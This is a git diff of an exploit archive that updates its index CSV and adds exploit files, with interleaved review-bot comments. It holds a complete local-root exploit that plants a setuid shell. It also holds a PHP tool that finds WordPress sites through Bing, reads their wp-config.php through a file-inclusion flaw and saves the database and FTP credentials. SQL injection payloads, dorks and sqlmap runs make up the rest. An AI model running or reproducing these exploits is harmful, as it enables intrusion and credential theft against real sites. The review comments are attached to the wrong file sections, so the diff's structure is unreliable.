diff --git a/files.csv b/files.csv
index f1e49ae42..e0e0fe69f 100755
--- a/files.csv
+++ b/files.csv
@@ -1720,7 +1720,7 @@ id,file,description,date,author,platform,type,port
 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
 2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
 2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
-2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
+2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 - (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
 2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
 2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (perl)",2006-07-15,UmZ,multiple,remote,10000
 2018,platforms/php/webapps/2018.txt,"FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability",2006-07-16,igi,php,webapps,0
@@ -33608,7 +33608,11 @@ id,file,description,date,author,platform,type,port
 37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37248,platforms/php/webapps/37248.txt,"SV: Milw0rm Clone Script v1.0 - (time based) SQLi",2015-06-09,"John Smith",php,webapps,0
 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
+37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-06-08,"Pawel Wylecial",windows,dos,0
 37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
+37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0
+37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0
diff --git a/platforms/linux/local/2015.py b/platforms/linux/local/2015.py
index a431feb1d..3096eb7b0 100755
--- a/platforms/linux/local/2015.py
+++ b/platforms/linux/local/2015.py
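Review bot: The four added rows break the ascending-id layout the surrounding rows follow: `37248` is inserted ahead of `37237`, and `37239`, `37244`, `37245` are interleaved between existing rows rather than appended after `37241` in order. The author and date columns also disagree with the files this same commit adds: 37244.txt's header names `ViRuS OS` (dated june 6, 2015) while the row says `Ali Khalil`; 37245.txt names `Shelesh Rauthan` while the row says `Sebastian khan`; and 37248.txt names `pancaker` with date 05.19.2015 while the row says `John Smith`, 2015-06-09. If the CSV deliberately records the submitter instead of the author, that convention should be documented in the header comment; otherwise the rows should be corrected to match the file headers. The `SV: ` prefix in the 37248 description looks like a mail-client reply marker carried over from the submission subject (37248.txt ends with a Swedish email trailer), and should presumably be dropped from the description.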
@@ -1,14 +1,14 @@
-#!/usr/bin/env python
-##############################################################################
-## rocksumountdirty.py: Rocks release <=4.1 local root exploit
-## quick and nasty version of the exploit. make sure the . is writable and
-## you clean up afterwards. ;)
-##
-## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
-##############################################################################
-x=__import__('os');c=x.getcwd()
-open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c))
-print "Rocks Clusters <=4.1 umount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]"
-x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c)
-
-# milw0rm.com [2006-07-15]
+#!/usr/bin/env python
+##############################################################################
+## rocksumountdirty.py: Rocks release <=4.1 local root exploit
+## quick and nasty version of the exploit. make sure the . is writable and
+## you clean up afterwards. ;)
+##
+## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
+##############################################################################
+x=__import__('os');c=x.getcwd()
+open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c))
+print "Rocks Clusters <=4.1 umount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]"
+x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c)
+
+# milw0rm.com [2006-07-15]
diff --git a/platforms/php/webapps/37244.txt b/platforms/php/webapps/37244.txt
new file mode 100755
index 000000000..5d63513f5
--- /dev/null
+++ b/platforms/php/webapps/37244.txt
@@ -0,0 +1,110 @@ +###################################################################################### +# Exploit Title: Wordpress Plugin 'WP Mobile Edition' LFI Vulnerability # +# Date: june 6, 2015 # +# Exploit Author: ViRuS OS # +# Google Dork: inurl:?fdx_switcher=mobile # +# Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/ # +# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip # +# Version: WP Mobile Edition Version 2.2.7 # +# Tested on : windows # +###################################################################################### +Description : +Wordpress Plugin 'WP Mobile Edition' is not filtering data so we can get the configration file in the path +< site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php> + +# Exploite Code : +> CoderLeeT | Fallag Gassrini | Taz| S4hk | Sir Matrix | Kuroi'SH +"; +echo "Follow Me On FaceBook : https://www.facebook.com/VirusXOS\n\n"; +echo "Follow Me On FaceBook : https://www.facebook.com/Weka.Mashkel007\n\n"; +echo "#################### Welcome Master ViRuS OS ################\n\n"; +echo "Server Target IP : "; +$ip=trim(fgets(STDIN,1024)); +$ip = explode('.',$ip); +$ip = $ip[0].'.'.$ip[1].'.'.$ip[2].'.'; +for($i=0;$i <= 255;$i++) +{ +$sites = array_map("site", bing("ip:$ip.$i wordpress")); +$un=array_unique($sites); +echo "[+] Scanning -> ", $ip.$i, ""."\n"; +echo "Found : ".count($sites)." 
sites\n\n"; +foreach($un as $pok){ +$host=findit($file,"DB_HOST', '","');"); +$db=findit($file,"DB_NAME', '","');"); +$us=findit($file,"DB_USER', '","');"); +$pw=findit($file,"DB_PASSWORD', '","');"); +$bda="http://$pok"; + $linkof='/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'; + $dn=($bda).($linkof); + $file=@file_get_contents($dn); + if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){ + echo "[+] Scanning => ".$bda."\n\n"; + echo "[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n"; + echo "[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n"; + echo "[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n"; + echo "[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n"; + $db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n"; + $user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n"; + $pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n"; + $host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n"; + $ux = "".$bda."\r\n"; + $ux1 = "".$db."\r\n"; + $ux2 = "".$user."\r\n"; + $ux3 = "".$pass."\r\n"; + $ux4 = "".$host."\r\n"; + $save=fopen('exploited.txt','ab'); + fwrite($save,"$ux"); + fwrite($save,"$ux1"); + fwrite($save,"$ux2"); + fwrite($save,"$ux3"); + fwrite($save,"$ux4"); + } + elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){ + echo "FTP user : ".findit($file,"FTP_USER','","');")."\n\n"; + echo "FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n"; + echo "FTP host : ".findit($file,"FTP_HOST','","');")."\n\n"; + } + else{echo $bda." 
: Exploit failed \n\n";} +} +} +function findit($mytext,$starttag,$endtag) { + $posLeft = stripos($mytext,$starttag)+strlen($starttag); + $posRight = stripos($mytext,$endtag,$posLeft+1); + return substr($mytext,$posLeft,$posRight-$posLeft); +} +function site($link){ +return str_replace("","",parse_url($link, PHP_URL_HOST)); +} +function bing($what){ +for($i = 1; $i <= 2000; $i += 10){ +$ch = curl_init(); +curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE"); +curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)"); +curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); +curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt'); +curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt'); +curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); +curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); +$data = curl_exec($ch); +preg_match_all('#;a=(.*?)" h="#',$data, $links); +foreach($links[1] as $link){ +$allLinks[] = $link; +} +if(!preg_match('#"sw_next"#',$data)) break; +} + +if(!empty($allLinks) && is_array($allLinks)){ +return array_unique(array_map("urldecode", $allLinks)); +} +} +?> \ No newline at end of file diff --git a/platforms/php/webapps/37245.txt b/platforms/php/webapps/37245.txt new file mode 100755 index 000000000..6ba9c8cd7 --- /dev/null +++ b/platforms/php/webapps/37245.txt 
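Review bot: The title attributes the flaw to the 'WP Mobile Edition' plugin, but the only vulnerable path the advisory gives, `/wp-content/themes/mTheme-Unus/css/css.php?files=`, sits under a theme directory; the header should state whether mTheme-Unus is bundled with the plugin, so that site owners know which component to look for on disk (it is unclear from the text alone). The header lists a single version (`Version: WP Mobile Edition Version 2.2.7`) with no fixed version and no vendor-notification status, leaving readers without a remediation target. Since the demonstrated read is of `wp-config.php` (database credentials), a note that affected sites should rotate those credentials after removing the component, and that requests to `css.php` with a `files=` value containing `../` are the thing to look for in access logs, would make the entry useful to defenders.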
@@ -0,0 +1,53 @@ +========================================================= + +[+] Title :- Pasworld detail.php Blind Sql Injection Vulnerability +[+] Date :- 5 - June - 2015 +[+] Vendor Homepage: :- http://main.pasworld.co.th/ +[+] Version :- All Versions +[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows +[+] Category :- webapps +[+] Google Dorks :- intext:"Powered By :: PAS World Communitcation" inurl:detail.php + site:go.th inurl:"detail.php?id=" +[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN) +[+] Team name :- Team Alastor Breeze +[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R +[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha +[+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com + +========================================================= + +[+] Severity Level :- High +[+] Request Method(s) :- GET / POST +[+] Vulnerable Parameter(s) :- detail.php?id= +[+] Affected Area(s) :- Entire admin, database, Server + + +========================================================= + +[+] About :- Unauthenticated SQL Injection via "detail.php?id=" parameter + +[+] SQL vulnerable File :- /home/DOMAIN/domains/DOMAIN.go.th/public_html/detail.php + +[+] POC :- http://127.0.0.1/detail.php?id=[SQL]' + +SQLMap +++++++++++++++++++++++++++ +python sqlmap.py --url "http://127.0.0.1/detail.php?id=[SQL]" --dbs +++++++++++++++++++++++++++ + +Parameter: id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: id=152 AND 1414=1414 + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause + Payload: id=152 AND (SELECT 1163 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (CASE WHEN (1163=1163) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) + + Type: UNION query + Title: MySQL UNION query (random number) - 9 columns + Payload: id=-7470 UNION ALL SELECT 
5982,5982,5982,5982,5982,CONCAT(0x7162766271,0x4b437a4a565555674571,0x7162707671),5982,5982,5982# + + + +========================================================= \ No newline at end of file diff --git a/platforms/php/webapps/37248.txt b/platforms/php/webapps/37248.txt new file mode 100755 index 000000000..9e2ede231 --- /dev/null +++ b/platforms/php/webapps/37248.txt 
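Review bot: The header claims `Request Method(s) :- GET / POST` and `Affected Area(s) :- Entire admin, database, Server`, but the evidence shown covers only the GET parameter `detail.php?id=` and database-level findings (boolean-, error- and UNION-based injection); the POST vector and the server-level impact are unsupported by the transcript and should be demonstrated or dropped. `Version :- All Versions` is paired with neither a vendor-contact date nor a fix status, so readers cannot tell whether a patched release exists. The `SQL vulnerable File` line also embeds a `/home/DOMAIN/domains/DOMAIN.go.th/public_html/` path that is a hosting-layout guess rather than something the PoC establishes; stating just `detail.php` would be more accurate.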
@@ -0,0 +1,115 @@ +<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> +|   Exploit Title: Milw0rm Clone Script v1.0 - (time based) SQLi                       | +|            Date: 05.19.2015                                                          | +|   Exploit Daddy: pancaker                                                            | +| Vendor Homepage: http://milw0rm.sourceforge.net/                                     | +|   Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download  | +|         Version: v1.0                                                                | +|       Tested On: Ubuntu 10.04                                                        | +|><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><| +|   SHOUTout: milw0rm &&& your mums pancakes                                           | +| CALLINGout: hak5 {crap to the core} &&& 1337day/inj3ct0r {scamm3rs + l33ch3rs}       | +<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> + + + + +### vuln codez  related.php ### + + + +<? echo SiteInfo('site_name');?> - exploits : vulnerabilities : videos : papers : shellcode +..zzz... + + + + + +### manual ### + +root@woop:~# zzz='10' +root@woop:~# lulz="program=hak5'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP($zzz)))a)%20AND%20'shit'='shit" +root@woop:~# time curl "http://localhost/milw0rm/related.php?$lulz" + +real    0m10.008s +user    0m0.004s +sys    0m0.004s + + + + + + +### sqlmap ### + +root@woop:~/sqlmap# python sqlmap.py -u 'http://localhost/milw0rm/related.php?program=lol' --current-user --is-dba +         _ + ___ ___| |_____ ___ ___  {1.0-dev-e8f87bf} +|_ -| . | |     | .'| . | +|___|_  |_|_|_|_|__,|  _| +      |_|           |_|   http://sqlmap.org + +[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program + +[*] starting at 09:46:53 + +[09:46:53] [INFO] resuming back-end DBMS 'mysql' +[09:46:53] [INFO] testing connection to the target URL +[09:46:53] [INFO] heuristics detected web page charset 'UTF-8' +sqlmap identified the following injection points with a total of 0 HTTP(s) requests: +--- +Parameter: program (GET) +    Type: AND/OR time-based blind +    Title: MySQL >= 5.0.12 AND time-based blind (SELECT) +    Payload: program=lol' AND (SELECT * FROM (SELECT(SLEEP(5)))yYCj) AND 'mQUB'='mQUB + +    Type: UNION query +    Title: MySQL UNION query (NULL) - 8 columns +    Payload: program=lol' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x77775a6355684c45565a,0x7176717671),NULL,NULL,NULL,NULL,NULL,NULL# +--- +[09:46:53] [INFO] the back-end DBMS is MySQL +web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) +web application technology: PHP 5.3.2, Apache 2.2.14 +back-end DBMS: MySQL 5.0.12 +[09:46:53] [INFO] fetching current user +current user:    'root@localhost' +[09:46:53] [INFO] testing if current user is DBA +[09:46:53] [INFO] fetching current user +[09:46:53] [WARNING] reflective value(s) found and filtering out +current user is DBA:    True +[09:46:53] [INFO] fetched data logged to text files under '/root/.sqlmap/output/localhost' + + + + + +<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> +|           >>> THIS 'EXPLOIT' IS SHIT LIKE ALL OF HAK5 'SHOWS' <<<          | +|             <<< NOT TO BE (RE)PUBLISHED ON 1337DAY/INJ3CT0R >>>            | +<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> + +                                   __ +___________    ____   ____ _____  |  | __ ___________ +\____ \__  \  /    \_/ ___\\__  \ |  |/ // __ \_  __ \ +|  |_> > __ \|   |  \  \___ / __ \|    <\  ___/|  | \/ +|   
__(____  /___|  /\___  >____  /__|_ \\___  >__| +|__|       \/     \/     \/     \/     \/    \/ +.........................cant be pr0 without ascii art + + + Den tisdag, 9 juni 2015 8:17 skrev john smith : + + + sir - y u no pub?https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4137 + + + + \ No newline at end of file diff --git a/platforms/windows/dos/37239.html b/platforms/windows/dos/37239.html new file mode 100755 index 000000000..7a92f8b54 --- /dev/null +++ b/platforms/windows/dos/37239.html @@ -0,0 +1,37 @@ + + + + + + + + + + \ No newline at end of file
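Review bot: The CVE reference for this issue, CVE-2015-4137, appears only inside the quoted email trailer at the end (`sir - y u no pub?https://cve.mitre.org/...`) rather than in the header block, so it is easy to miss when indexing; it belongs on a `CVE:` line next to `Version: v1.0`, and the email trailer itself should be removed from the advisory. The sqlmap transcript reports `a total of 0 HTTP(s) requests` because it resumed a stored session, so it is a replay of earlier results rather than an independent confirmation; the manual `time curl` run above it is the actual demonstration and should be identified as such. The title says `(time based)` while the transcript also lists a UNION-based injection point on the same `program` parameter, which the title could reflect.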